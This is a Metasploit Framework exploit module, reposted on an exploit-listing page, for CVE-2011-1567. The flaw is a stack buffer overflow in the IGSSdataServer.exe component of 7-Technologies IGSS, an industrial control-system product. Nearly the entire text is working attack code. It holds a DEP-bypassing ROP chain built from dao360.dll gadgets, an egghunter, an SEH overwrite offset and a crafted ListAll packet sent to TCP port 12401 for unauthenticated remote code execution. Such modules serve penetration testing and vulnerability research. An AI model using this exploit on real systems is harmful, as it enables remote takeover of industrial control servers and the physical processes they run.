ExploitFixes
7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow - [CVE: 2011-1567] 2011-05-17 11:15:04

##
# $Id: igss9_igssdataserver_listall.rb 12639 2011-05-16 19:30:17Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::Egghunter
include Msf::Exploit::Remote::Tcp

def initialize(info={})
super(update_info(info,
'Name' => "7-Technologies IGSS <= v9.00.00 b11063 IGSSdataServer.exe Stack Overflow",
'Description' => %q{
This module exploits a vulnerability in the igssdataserver.exe component of 7-Technologies
IGSS up to version 9.00.00 b11063. While processing a ListAll command, the application
fails to do proper bounds checking before copying data into a small buffer on the stack.
This causes a buffer overflow and allows to overwrite a structured exception handling record
on the stack, allowing for unauthenticated remote code execution.
},
'License' => MSF_LICENSE,
'Version' => '$Revision: 12639 $',
'Author' =>
[
'Luigi Auriemma', #Initial discovery, poc
'Lincoln', #Metasploit
'corelanc0d3r', #Rop exploit, combined XP SP3 & 2003 Server
'sinn3r', #Serious Msf style policing
],
'References' =>
[
['CVE', '2011-1567'],
['OSVDB', ''],
['URL', 'http://aluigi.altervista.org/adv/igss_2-adv.txt'],
],
'Payload' =>
{
'BadChars' => "\x00",
},
'DefaultOptions' =>
{
'ExitFunction' => 'process',
},
'Platform' => 'win',
'Targets' =>
[
[
'Windows XP SP3/2003 Server R2 SP2 (DEP Bypass)',
{
'Ret' => 0x1b77ca8c, #dao360.dll pivot 1388 bytes
'Offset' => 500
}
],
],
'Privileged' => false,
'DisclosureDate' => "March 24 2011",
'DefaultTarget' => 0))

register_options(
[
Opt::RPORT(12401)
], self.class)
end

def junk
return rand_text(4).unpack("L")[0].to_i
end

def exploit

eggoptions =
{
:checksum => false,
:eggtag => 'w00t',
:depmethod => 'virtualprotect',
:depreg => 'esi'
}

badchars = "\x00"
hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

#dao360.dll - pvefindaddr rop 'n roll
rop_chain = [
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b7681c4, # rop nop
0x1b72f174, # POP EAX # RETN 08
0xA1A10101,
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73a55c, # XCHG EAX,EBX # RETN
junk,
junk,
0x1b724004, # pop ebp
0x1b72f15f, # &push esp # retn 8
0x1b72f040, # POP ECX # RETN
0x1B78F010, # writeable
0x1b7681c2, # xor eax,eax # retn
0x1b72495c, # add al,40 # mov [esi+4],eax # pop esi # retn 4
0x41414141,
0x1b76a883, # XCHG EAX,ESI # RETN 00
junk,
0x1b7785c1, # XOR EDX,EDX # CMP EAX,54 # SETE DL # MOV EAX,EDX # ADD ESP,8 # RETN 0C
junk,
junk,
0x1b78535c, # ADD EDX,ESI # SUB EAX,EDX # MOV DWORD PTR DS:[ECX+F8],EAX # XOR EAX,EAX # POP ESI # RETN 10
junk,
junk,
junk,
junk,
0x1b7280b4, # POP EDI # XOR EAX,EAX # POP ESI # RETN
junk,
junk,
junk,
junk,
0x1b7681c4, # rop nop (edi)
0x90909090, # esi -> eax -> nop
0x1b72f174, # POP EAX # RETN 08
0xA1F50214, # offset to &VirtualProtect
0x1b7762a8, # ADD EAX,5E5F0000 # RETN 08
junk,
junk,
0x1b73f3bd, # MOV EAX,DWORD PTR DS:[EAX] # RETN
junk,
junk,
0x1b76a883, # XCHG EAX,ESI # RETN 00
0x1b72f040, # pop ecx
0x1B78F010, # writeable (ecx)
0x1b764716, # PUSHAD # RETN
].pack('V*')

header = "\x00\x04\x01\x00\x34\x12\x0D\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00"
header << rand_text(14)
sploit = rop_chain
sploit << "\x90" * 10
sploit << hunter
sploit << rand_text(target['Offset'] - (sploit.length))
sploit << [target.ret].pack('V')
sploit << egg
sploit << rand_text(2000)

connect
print_status("Sending request...")
sock.put(header + sploit)
handler
disconnect

end

end